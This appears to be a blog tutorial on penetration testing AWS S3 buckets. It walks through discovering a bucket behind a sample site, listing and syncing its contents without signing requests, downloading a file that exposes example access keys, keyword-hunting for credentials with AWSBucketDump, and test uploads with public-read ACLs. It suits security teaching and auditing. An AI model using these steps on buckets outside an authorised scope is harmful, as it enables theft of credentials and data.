AWS Penetration Testing – S3 Buckets

AWS Simple Storage Service or S3 is an object storage service which boasts great scalability, security and performance. Using the S3 service, customers can create buckets. These buckets allow for simple object storage across multiple geographic regions.

S3 buckets are commonly used for file storage and static website hosting, this is a feature which Amazon specifically lists within the AWS console. Although it is supported, exposing S3 buckets to the public Internet does come with an increased security risk.

As a penetration tester, enumerating S3 buckets is an extremely valuable skill to have. S3 buckets have been known to leak AWS Access Keys which would grant an initial foothold within the cloud environment.

Enumerating public S3 buckets

In this example, there is a website called “jessies-bookstore.com”, which is hosted within an S3 bucket. As this is publicly accessible and within scope it would be a great place to start any enumeration.

terminal$ host jessies-bookstore.com
jessies-bookstore.com has the address 52.92.234.139

terminal$ host 52.92.234.139
139.234.92.52.in-addr.arpa domain name pointer s3-website-eu-north-1.amazonaws.com.

Using the host command, we’ve performed a DNS lookup and fetched the IP address for the “jessies-bookstore.com” domain. We’ve also been able to use this same host command on the found IP address, it seems that this domain actually points to an S3 bucket.

It’s worth noting, that whenever a bucket is configured for the web it is assigned its own DNS, an example of this would be “jessies-bookstore.s3-website-eu-north-1.amazonaws.com”.

Another excellent way to locate S3 buckets is to simply inspect website source code. Websites often use S3 buckets as storage for website files and images. They perform the role of a content delivery network “CDN”.

With the information found during our DNS lookup, we can identify both the bucket name “jessies-bookstore” and the region “eu-north-1”. Bucket names are unique across the whole S3 service, not just an individual account and so it’s becoming more common to find bucket names which include a numeric or random string.

terminal$ aws s3 ls s3://jessies-bookstore.s3-website-eu-north-1.amazonaws.com --no-sign-request
2022-05-22 19:16:45       3162 index.html
2023-09-10 17:47:16     159790 backup.zip
2023-09-27 01:59:28       3472 access.log
2023-09-27 01:59:30        300 backup-keys-jhgsiyt.txt

Using the AWS CLI tool we can see that our attempts to list the bucket were successful. There appear to be several interesting files which should be inspected further, most notably backup-keys-jhgsiyt.txt and backup.zip. S3 hosted files can be accessed by navigating to them in a web browser, since we’re in the terminal we can use curl. Any file which is located within an S3 bucket can be navigated by appending the filename to the target domain.

terminal$ curl jessies-bookstore.s3-website-eu-north-1.amazonaws.com/backup-keys-jhgsiyt.txt

# Hi John, here's the backup user access keys. 
aws_access_key_id=UJIJSUEGOV6AFVFTB5NM
aws_secret_access_key=pOLkoKH78GFs3/g2no55DGG4f5IjACwSW3gXcAgK

Excellent, curl allowed us to download the specified file and view the contents. Assuming those keys are still valid, they would enable access to the cloud environment. With this access, further service enumeration could be conducted.

In addition to downloading a singular file, AWS CLI comes with the functionality to download the full bucket contents to a specified destination on the local computer.

terminal$ aws s3 sync s3://jessies-bookstore.s3-website-eu-north-1.amazonaws.com ./s3-download-folder/ --no-sign-request

One of the the most famous examples of insecure S3 buckets being the million dollar bug in instagram.

How S3 manages public bucket access

S3 has four main settings for managing public access to buckets. Each setting is enabled by default during the bucket setup.

  • Block public access to buckets and objects granted through new access control lists (ACLs): S3 will block public access permissions applied to newly added buckets or objects, and prevent the creation of new public access ACLs for existing buckets and objects. This setting doesn’t change any existing permissions that allow public access to S3 resources using ACLs.
  • Block public access to buckets and objects granted through any access control lists (ACLs): S3 will ignore all ACLs that grant public access to buckets and objects.
  • Block public access to buckets and objects granted through new public bucket or access point policies: S3 will block new bucket and access point policies that grant public access to buckets and objects. This setting doesn’t change any existing policies that allow public access to S3 resources.
  • Block public and cross-account access to buckets and objects through any public bucket or access point policies: S3 will ignore public and cross-account access for buckets or access points with policies that grant public access to buckets and objects.

S3 also allows for policies to be directly attached to a bucket. As policies can be confusing for people new to AWS this is another opportunity for misconfiguration. An example of a policy which allows for bucket listing can be seen below.

{
    "Version": "2012-10-17",
    "Id": "Policy0000670101234",
    "Statement": [
        {
            "Sid": "Stmt0000670101234",
            "Effect": "Allow",
            "Principal": "*",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::jessies-bookstore"
        }
    ]
}

This policy states that the action “s3:ListBucket” is allowed for the resource “arn:aws:s3:::jessies-bookstore-com”. This resource is the AWS ARN (Amazon Resource Name) for the S3 bucket “jessies-bookstore”.

Further bucket enumeration

Now that we have some understanding of bucket configuration, let’s take a look at another example. Some S3 buckets require that the user is authenticated before it allows them to list the contents. Unfortunately, some AWS users can be confused by this and assume it means authenticated to their AWS environment.

If configured in such a way, AWS can allow any AWS CLI authenticated user to list the bucket contents. This means security policies can be bypassed simply by logging into your own AWS account and then listing the contents. As Amazon allow the public to create a free tier AWS account this essentially means anyone can list the bucket contents.

terminal$ aws --profile arctil s3 ls s3://jessies-bookstore
2022-05-22 19:16:45       3162 index.html
2023-09-10 17:47:16     159790 backup.zip
2023-09-27 01:59:28       3472 access.log
2023-09-27 01:59:30        300 backup-keys-jhgsiyt.txt

As we can see, even though we’ve used the “arctil” profile, we have still been able to list the contents of the S3 bucket.

Using AWSBucketDump to enumerate S3 buckets

AWSBucketDump is a tool written in Python to make S3 bucket enumeration a much more streamlined process. This tool will automatically browse S3 buckets and automatically look for files which match our search criteria.

terminal$  python AWSBucketDump.py -l bucketslist.txt -g keywords.txt -D -m 5000 -d 1

When using AWSBucketDump, a list of bucket names and keywords will need to be specified, these can be specified using the flags -l and -g. The -D flag instructs the tool to download any files found, -m specifies the maximum file size and -d to create a new local directory for each bucket.

Once ran, it’ll check the bucket contents for these keywords and then download the file when it finds a match. Some great examples of keywords which could be considered valuable are “aws_access_key_id” and “password”.

AWSBucketDump can find a large number of S3 buckets, it’s important to ensure you’re using a targeted approach to finding buckets. All buckets that you inspect must be a part of the target environment and in scope.

Additionally, AWSBucketDump can result in a large amount of disk space being used on your local computer. It is recommended that a small file size be specified along with a very specific keywords file.

Uploading To Public Buckets

As we’ve seen in previous examples, S3 can allow the public to list the contents. On occasion, it may even be possible to upload files to the bucket, this in itself can be somewhat problematic as using storage space could cost a corporation a lot of money. File upload can be tested by using the S3 cp command.

terminal$ aws s3 cp local-file.txt s3://jessies-bookstore

If successful, this file would then display when the bucket contents are listed. However, this is not always without issue. S3 buckets can occasionally be configured in such a way that the uploaded file will not display, this would make it appear as though the upload has failed.

To get around this restriction, it may be possible to use the –acl public-read option and set the file to be publicly accessible. This means that as the file has been specified as readable to the public when the bucket is listed, assuming the upload worked the file will now display.

terminal$ aws s3 cp local-file.txt s3://jessies-bookstore --acl public-read

Conclusion

S3 is a fantastic service which can be utilised in many different ways. Ensuring public access is carefully configured is just the first step in securing a cloud environment. If a bucket needs to be publicly accessible then careful consideration must be given to any files which are uploaded and accessible.




Up Next “EC2”

Spread the love